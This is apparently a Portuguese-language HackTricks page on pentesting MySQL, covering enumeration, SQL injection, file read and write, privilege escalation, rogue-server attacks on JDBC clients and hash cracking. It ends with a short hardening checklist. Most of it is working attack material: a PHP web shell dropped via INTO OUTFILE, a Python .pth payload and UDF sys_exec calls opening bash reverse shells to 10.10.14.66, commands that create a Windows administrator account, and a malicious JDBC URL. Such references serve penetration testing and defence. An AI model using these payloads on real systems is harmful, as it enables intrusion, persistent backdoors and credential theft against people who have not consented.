3306 - Pentesting Mysql

Reading time: 18 minutes

Informação Básica

MySQL pode ser descrito como um Relational Database Management System (RDBMS) de código aberto que está disponível gratuitamente. Ele opera sobre a Structured Query Language (SQL), permitindo o gerenciamento e manipulação de bancos de dados.

Porta padrão: 3306

3306/tcp open  mysql

Conectar

Local

mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)

Remoto

mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost

External Enumeration

Algumas das ações de enumeration requerem credenciais válidas

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
msf> use auxiliary/scanner/mysql/mysql_version
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
msf> use auxiliary/admin/mysql/mysql_enum #Creds
msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds
msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds

Brute force

Escrever qualquer dado binário

CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY)
CONVERT(from_base64("aG9sYWFhCg=="), BINARY)

Comandos MySQL

show databases;
use <database>;
connect <database>;
show tables;
describe <table_name>;
show columns from <table>;

select version(); #version
select @@version(); #version
select user(); #User
select database(); #database name

#Get a shell with the mysql client user
\! sh

#Basic MySQLi
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<TABLE NAME>"

#Read & Write
## Yo need FILE privilege to read & write to files.
select load_file('/var/lib/mysql-files/key.txt'); #Read file
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'

#Try to change MySQL root password
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';
FLUSH PRIVILEGES;
quit;

mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
mysql -u root -h 127.0.0.1 -e 'show databases;'

Enumeração de Permissões do MySQL

#Mysql
SHOW GRANTS [FOR user];
SHOW GRANTS;
SHOW GRANTS FOR 'root'@'localhost';
SHOW GRANTS FOR CURRENT_USER();

# Get users, permissions & hashes
SELECT * FROM mysql.user;

#From DB
select * from mysql.user where user='root';
## Get users with file_priv
select user,file_priv from mysql.user where file_priv='Y';
## Get users with Super_priv
select user,Super_priv from mysql.user where Super_priv='Y';

# List functions
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION';
#@ Functions not from sys. db
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys';

Você pode ver na documentação o significado de cada privilégio: https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html

MySQL File RCE

MySQL File priv to SSRF/RCE

INTO OUTFILE → Python .pth RCE (ganchos de configuração específicos do site)

Abusando da clássica primitiva INTO OUTFILE é possível obter execução arbitrária de código em alvos que posteriormente executam scripts em Python.

1. Use INTO OUTFILE para deixar um arquivo customizado .pth dentro de qualquer diretório carregado automaticamente por site.py (ex.: .../lib/python3.10/site-packages/).
2. O arquivo .pth pode conter uma única linha começando com import seguida de código Python arbitrário que será executado toda vez que o interpretador iniciar.
3. Quando o interpretador é executado implicitamente por um script CGI (por exemplo /cgi-bin/ml-draw.py com shebang #!/bin/python), o payload é executado com os mesmos privilégios do processo do servidor web (FortiWeb executou como root → full pre-auth RCE).

Exemplo de payload .pth (linha única, não podem ser incluídos espaços no payload SQL final, então hex/UNHEX() ou concatenação de strings pode ser necessária):

import os,sys,subprocess,base64;subprocess.call("bash -c 'bash -i >& /dev/tcp/10.10.14.66/4444 0>&1'",shell=True)

Exemplo de criação do arquivo através de uma query UNION (caracteres de espaço substituídos por /**/ para bypassar um filtro de espaços sscanf("%128s") e manter o comprimento total ≤128 bytes):

'/**/UNION/**/SELECT/**/token/**/FROM/**/fabric_user.user_table/**/INTO/**/OUTFILE/**/'../../lib/python3.10/site-packages/x.pth'

Limitações importantes & bypasses:

• INTO OUTFILE não pode sobrescrever arquivos existentes; escolha um novo nome de arquivo.
• O caminho do arquivo é resolvido relativo ao MySQL’s CWD, então prefixar com ../../ ajuda a encurtar o caminho e contornar restrições de caminho absoluto.
• Se a entrada do atacante for extraída com %128s (ou similar) qualquer espaço vai truncar o payload; use sequências de comentário do MySQL /**/ ou /*!*/ para substituir espaços.
• O usuário MySQL que executa a query precisa do privilégio FILE, mas em muitos appliances (e.g. FortiWeb) o serviço roda como root, dando acesso de escrita quase em todo lugar.

Após dropar o .pth, basta requisitar qualquer CGI tratado pelo python interpreter para obter execução de código:

GET /cgi-bin/ml-draw.py HTTP/1.1
Host: <target>

O processo Python importará automaticamente o .pth malicioso e executará o shell payload.

# Attacker
$ nc -lvnp 4444
id
uid=0(root) gid=0(root) groups=0(root)

MySQL leitura arbitrária de arquivo pelo cliente

Na prática, quando você tenta load data local into a table o conteúdo de um arquivo, o servidor MySQL ou MariaDB solicita que o cliente o leia e envie o conteúdo. Então, se você conseguir manipular um mysql client para conectar ao seu próprio MySQL server, você pode ler arquivos arbitrários.
Observe que este é o comportamento ao usar:

load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

(Repare na palavra "local")
Porque sem o "local" você pode obter:

mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

Initial PoC: https://github.com/allyshka/Rogue-MySql-Server
Neste artigo você pode ver uma descrição completa do ataque e até como estendê-lo para RCE: https://paper.seebug.org/1113/
Aqui você pode encontrar uma visão geral do ataque: http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/

​

POST

Usuário Mysql

Será muito interessante se mysql estiver sendo executado como root:

cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"
systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1

Configurações Perigosas de mysqld.cnf

Na configuração dos serviços MySQL, várias opções são usadas para definir seu funcionamento e medidas de segurança:

• A opção user é usada para designar o usuário sob o qual o serviço MySQL será executado.
• password é usada para definir a senha associada ao usuário MySQL.
• admin_address especifica o endereço IP que escuta por conexões TCP/IP na interface de rede administrativa.
• A variável debug indica as configurações de depuração atuais, incluindo informações sensíveis nos registros.
• sql_warnings controla se strings informativas são geradas para instruções INSERT de linha única quando surgem avisos, possivelmente contendo dados sensíveis nos registros.
• Com secure_file_priv, o escopo das operações de importação e exportação de dados é restrito para aumentar a segurança.

Privilege escalation

# Get current user (an all users) privileges and hashes
use mysql;
select user();
select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user;

# Get users, permissions & creds
SELECT * FROM mysql.user;
mysql -u root --password=<PASSWORD> -e "SELECT * FROM mysql.user;"

# Create user and give privileges
create user test identified by 'test';
grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;

# Get a shell (with your permissions, usefull for sudo/suid privesc)
\! sh

Escalada de Privilégios via biblioteca

Se o mysql server estiver sendo executado como root (ou um usuário diferente com mais privilégios), você pode fazê-lo executar comandos. Para isso, você precisa usar funções definidas pelo usuário. E para criar uma função definida pelo usuário você precisará de uma biblioteca para o OS que está executando o mysql.

A biblioteca maliciosa a ser usada pode ser encontrada dentro do sqlmap e dentro do metasploit executando locate "*lib_mysqludf_sys*". Os arquivos .so são bibliotecas linux e os .dll são os do Windows, escolha o que você precisa.

Se você não tiver essas bibliotecas, você pode procurá-las, ou baixar este linux C code e compilá-lo dentro da máquina vulnerável linux:

gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

Agora que você tem a biblioteca, faça login no Mysql como um usuário privilegiado (root?) e siga os próximos passos:

Linux

# Use a database
use mysql;
# Create a table to load the library and move it to the plugins dir
create table npn(line blob);
# Load the binary library inside the table
## You might need to change the path and file name
insert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));
# Get the plugin_dir path
show variables like '%plugin%';
# Supposing the plugin dir was /usr/lib/x86_64-linux-gnu/mariadb19/plugin/
# dump in there the library
select * from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';
# Create a function to execute commands
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
# Execute commands
select sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');
select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');

Windows

# CHech the linux comments for more indications
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));
show variables like '%plugin%';
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");

Dica do Windows: criar diretórios com NTFS ADS via SQL

No NTFS, você pode forçar a criação de diretórios usando um alternate data stream mesmo quando existe apenas um file write primitive. Se a classic UDF chain espera um diretório plugin mas ele não existe e @@plugin_dir é desconhecido ou bloqueado, você pode criá-lo primeiro com ::$INDEX_ALLOCATION:

SELECT 1 INTO OUTFILE 'C:\\MySQL\\lib\\plugin::$INDEX_ALLOCATION';
-- After this, `C:\\MySQL\\lib\\plugin` exists as a directory

Isso transforma o limitado SELECT ... INTO OUTFILE em um primitivo mais completo em stacks Windows, criando a estrutura de pastas necessária para UDF drops.

Extraindo credenciais MySQL de arquivos

Dentro de /etc/mysql/debian.cnf você pode encontrar a senha em texto plano do usuário debian-sys-maint

cat /etc/mysql/debian.cnf

Você pode usar essas credenciais para fazer login no banco de dados mysql.

Inside the file: /var/lib/mysql/mysql/user.MYD you can find todos os hashes dos usuários do MySQL (aqueles que você pode extrair de mysql.user dentro do banco de dados).

Você pode extraí-los executando:

grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"

Habilitar logging

Você pode habilitar o registro de consultas do mysql dentro de /etc/mysql/my.cnf descomentando as linhas a seguir:

Arquivos úteis

Arquivos de Configuração

• windows *
• config.ini
• my.ini
• windows\my.ini
• winnt\my.ini
• <InstDir>/mysql/data/
• unix
• my.cnf
• /etc/my.cnf
• /etc/mysql/my.cnf
• /var/lib/mysql/my.cnf
• ~/.my.cnf
• /etc/my.cnf
• Histórico de Comandos
• ~/.mysql.history
• Arquivos de Log
• connections.log
• update.log
• common.log

Bancos de Dados/Tabelas Padrão do MySQL

Comandos Automáticos do HackTricks

Protocol_Name: MySql    #Protocol Abbreviation if there is one.
Port_Number:  3306     #Comma separated if there is more than one.
Protocol_Description: MySql     #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for MySql
Note: |
MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).

https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-mysql.html

Entry_2:
Name: Nmap
Description: Nmap with MySql Scripts
Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306

Entry_3:
Name: MySql
Description: Attempt to connect to mysql server
Command: mysql -h {IP} -u {Username}@localhost

Entry_4:
Name: MySql consolesless mfs enumeration
Description: MySql enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'

Destaques 2023-2025 (novos)

JDBC propertiesTransform deserialization (CVE-2023-21971)

A partir do Connector/J <= 8.0.32 um atacante que consiga influenciar o JDBC URL (por exemplo em software de terceiros que solicita uma connection string) pode solicitar que classes arbitrárias sejam carregadas no client side via o parâmetro propertiesTransform. Se um gadget presente no class-path puder ser carregado, isso resulta em remote code execution in the context of the JDBC client (pre-auth, porque nenhuma credencial válida é necessária). Um PoC mínimo fica assim:

jdbc:mysql://<attacker-ip>:3306/test?user=root&password=root&propertiesTransform=com.evil.Evil

Executar Evil.class pode ser tão simples quanto colocá-lo no class-path da aplicação vulnerável ou permitir que um servidor MySQL rogue envie um objeto serializado malicioso. O problema foi corrigido no Connector/J 8.0.33 – atualize o driver ou configure explicitamente propertiesTransform em uma allow-list. (Veja o write-up da Snyk para detalhes)

Ataques Rogue / Fake de servidores MySQL contra clientes JDBC

Várias ferramentas open-source implementam um protocolo MySQL parcial para atacar clientes JDBC que fazem conexões externas:

• mysql-fake-server (Java, supports file read and deserialization exploits)
• rogue_mysql_server (Python, similar capabilities)

Caminhos de ataque típicos:

1. A aplicação vítima carrega mysql-connector-j com allowLoadLocalInfile=true ou autoDeserialize=true.
2. O atacante controla DNS / host entry para que o hostname do DB resolva para uma máquina sob seu controle.
3. O servidor malicioso responde com pacotes forjados que disparam ou LOCAL INFILE para leitura arbitrária de arquivos ou Java deserialization → RCE.

Exemplo de one-liner para iniciar um fake server (Java):

java -jar fake-mysql-cli.jar -p 3306  # from 4ra1n/mysql-fake-server

Em seguida, aponte a aplicação vítima para jdbc:mysql://attacker:3306/test?allowLoadLocalInfile=true e leia /etc/passwd codificando o nome do arquivo em base64 no campo username (fileread_/etc/passwd → base64ZmlsZXJlYWRfL2V0Yy9wYXNzd2Q=).

Cracking caching_sha2_password hashes

MySQL ≥ 8.0 armazena os hashes de senha como $mysql-sha2$ (SHA-256). Tanto o Hashcat (mode 21100) quanto o John-the-Ripper (--format=mysql-sha2) suportam cracking offline desde 2023. Extraia a coluna authentication_string e alimente-a diretamente:

# extract hashes
echo "$mysql-sha2$AABBCC…" > hashes.txt
# Hashcat
hashcat -a 0 -m 21100 hashes.txt /path/to/wordlist
# John the Ripper
john --format=mysql-sha2 hashes.txt --wordlist=/path/to/wordlist

Checklist de hardening (2025)

• Defina LOCAL_INFILE=0 e --secure-file-priv=/var/empty para eliminar a maioria dos primitivos de leitura/gravação de arquivos.
• Remova o privilégio FILE das contas de aplicação.
• No Connector/J, configure allowLoadLocalInfile=false, allowUrlInLocalInfile=false, autoDeserialize=false, propertiesTransform= (vazio).
• Desative plugins de autenticação não usados e exija TLS (require_secure_transport = ON).
• Monitore por CREATE FUNCTION, INSTALL COMPONENT, INTO OUTFILE, LOAD DATA LOCAL e por declarações SET GLOBAL súbitas.

Referências

• Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)

• Oracle MySQL Connector/J propertiesTransform RCE – CVE-2023-21971 (Snyk)

• mysql-fake-server – Rogue MySQL server for JDBC client attacks

• The Art of PHP: CTF‑born exploits and techniques

• Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)